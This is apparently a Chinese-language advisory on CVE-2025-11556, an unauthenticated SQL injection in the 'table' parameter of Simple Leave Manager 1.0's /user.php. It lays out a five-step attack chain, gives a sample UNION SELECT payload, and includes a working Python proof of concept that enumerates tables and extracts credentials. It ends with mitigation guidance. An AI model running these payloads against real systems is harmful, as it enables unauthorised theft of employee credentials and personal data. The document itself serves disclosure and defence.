CVE-2025-11556：Simple Leave Manager 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11556

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Simple Leave Manager

漏洞概述

CVE-2025-11556是code-projects公司开发的Simple Leave Manager（简单请假管理系统）1.0版本中存在的一个高危SQL注入漏洞。该漏洞位于应用程序的/user.php文件中，具体涉及对参数"table"的不安全处理。攻击者可以通过精心构造的恶意SQL语句作为参数值，绕过应用程序的输入验证机制，直接与后端数据库进行交互。由于该漏洞可以通过网络远程利用，且无需任何身份认证和用户交互，攻击者可以在未授权的情况下对数据库执行任意SQL查询操作。该漏洞的CVSS 3.1评分为7.3分，属于高危级别，其机密性、完整性和可用性均受到低程度的影响。值得注意的是，该漏洞的利用代码已经在GitHub上公开发布，意味着任何具备基本攻击知识的攻击者都可以利用此漏洞对未打补丁的系统发起攻击。由于请假管理系统通常包含员工个人信息、请假记录等敏感数据，SQL注入漏洞可能导致大量敏感信息泄露，对企业和组织的信息安全构成严重威胁。建议所有使用Simple Leave Manager 1.0版本的用户立即采取防护措施，密切关注官方补丁发布动态，并在补丁发布后第一时间进行更新。

技术细节

该漏洞的根本原因在于Simple Leave Manager 1.0版本的/user.php文件中，对用户可控的"table"参数缺乏充分的输入验证和参数化处理。在PHP应用程序开发中，当开发者直接将用户输入拼接到SQL查询语句中而没有使用预编译语句（Prepared Statements）或参数化查询时，就会产生SQL注入漏洞。具体到本漏洞，攻击者可以通过在HTTP请求中向"table"参数注入恶意SQL片段（如UNION SELECT、OR 1=1、information_schema查询等），使应用程序执行非预期的数据库操作。

利用方式方面，攻击者首先需要定位目标系统的/user.php端点，然后构造包含恶意SQL负载的HTTP请求。由于该漏洞无需认证即可利用，攻击者无需获取任何账户凭证。典型的攻击载荷可能形如：`http://target/user.php?table=users UNION SELECT username,password FROM admin--`。成功利用后，攻击者可以执行以下操作：1）提取数据库中的所有表名和列名（通过查询information_schema）；2）窃取用户凭证和个人敏感信息；3）修改或删除数据库中的记录；4）在特定条件下利用数据库特性（如MySQL的INTO OUTFILE）写入Webshell，实现更深层次的系统入侵。

该漏洞的攻击复杂度低（AC:L），无需用户交互（UI:N），表明其极易被自动化工具批量利用，对互联网上暴露的Simple Leave Manager实例构成广泛威胁。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者通过搜索引擎（如Shodan、Censys）或网络爬虫发现互联网上暴露的Simple Leave Manager 1.0实例，识别/user.php端点的存在。

STEP 2

步骤2：漏洞探测

攻击者向/user.php的table参数发送包含SQL注入测试负载的HTTP请求，通过布尔盲注或错误信息确认漏洞的存在。

STEP 3

步骤3：数据库信息收集

利用UNION SELECT结合information_schema查询，获取目标数据库的表结构、列名和数据库版本信息。

STEP 4

步骤4：敏感数据提取

通过构造SQL查询，提取用户表中的用户名、密码哈希、个人信息、请假记录等敏感数据。

STEP 5

步骤5：权限提升与持久化

利用提取的管理员凭证登录系统，或通过SQL注入写入Webshell，实现对服务器的更深层次控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11556 - Simple Leave Manager 1.0 SQL Injection PoC
# Vulnerability: SQL Injection via 'table' parameter in /user.php
# Author: Security Researcher

import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target.com"
VULNERABLE_ENDPOINT = "/user.php"

def exploit_sqli(target_url, payload):
    """Exploit SQL injection via the 'table' parameter"""
    url = f"{target_url}{VULNERABLE_ENDPOINT}"
    params = {
        "table": payload
    }
    try:
        response = requests.get(url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[ERROR] Request failed: {e}")
        return None

def extract_tables(target_url):
    """Extract database tables using information_schema"""
    # Payload to enumerate tables from current database
    payload = "users UNION SELECT table_name,table_schema FROM information_schema.tables WHERE table_schema=database()--"
    print(f"[*] Extracting tables from {target_url}...")
    result = exploit_sqli(target_url, payload)
    if result:
        print(f"[+] Response:\n{result[:500]}")
    return result

def extract_credentials(target_url):
    """Attempt to extract user credentials"""
    # Payload to extract username and password (adjust columns based on actual schema)
    payload = "users UNION SELECT username,password FROM users--"
    print(f"[*] Attempting to extract credentials from {target_url}...")
    result = exploit_sqli(target_url, payload)
    if result:
        print(f"[+] Response:\n{result[:500]}")
    return result

def boolean_based_test(target_url):
    """Test for SQL injection using boolean-based technique"""
    true_payload = "users AND 1=1--"
    false_payload = "users AND 1=2--"
    
    true_response = exploit_sqli(target_url, true_payload)
    false_response = exploit_sqli(target_url, false_payload)
    
    if true_response and false_response and true_response != false_response:
        print("[+] SQL Injection confirmed! Different responses for true/false conditions.")
        return True
    print("[-] Could not confirm SQL injection.")
    return False

if __name__ == "__main__":
    print(f"[*] CVE-2025-11556 PoC - Simple Leave Manager 1.0 SQL Injection")
    print(f"[*] Target: {TARGET_URL}")
    print("-" * 60)
    
    # Step 1: Confirm the vulnerability
    if boolean_based_test(TARGET_URL):
        # Step 2: Extract database information
        extract_tables(TARGET_URL)
        # Step 3: Extract credentials
        extract_credentials(TARGET_URL)
    
    print("[*] Exploitation complete.")

影响范围

code-projects Simple Leave Manager 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）通过Web服务器配置限制对/user.php端点的公网访问，仅允许可信IP访问；2）部署WAF规则拦截包含UNION、SELECT、information_schema等关键词的恶意请求；3）修改源代码，将table参数的值改为硬编码或从预定义的合法值列表中选取，避免直接拼接用户输入到SQL语句中；4）将数据库账户权限降至最低，禁止DROP、FILE等危险操作；5）启用数据库审计日志，实时监控异常SQL查询行为；6）定期备份数据库，以便在遭受攻击时能够快速恢复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11556
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11556
3 Details https://www.cvedetails.com/cve/CVE-2025-11556/
4 VulDB https://vuldb.com/cve/CVE-2025-11556
5 Link https://code-projects.org/
6 Link https://github.com/asd1238525/cve/blob/main/SQL8.md
7 Link https://vuldb.com/?ctiid.327716
8 Link https://vuldb.com/?id.327716
9 Link https://vuldb.com/?submit.671358
10 Link https://github.com/asd1238525/cve/blob/main/SQL8.md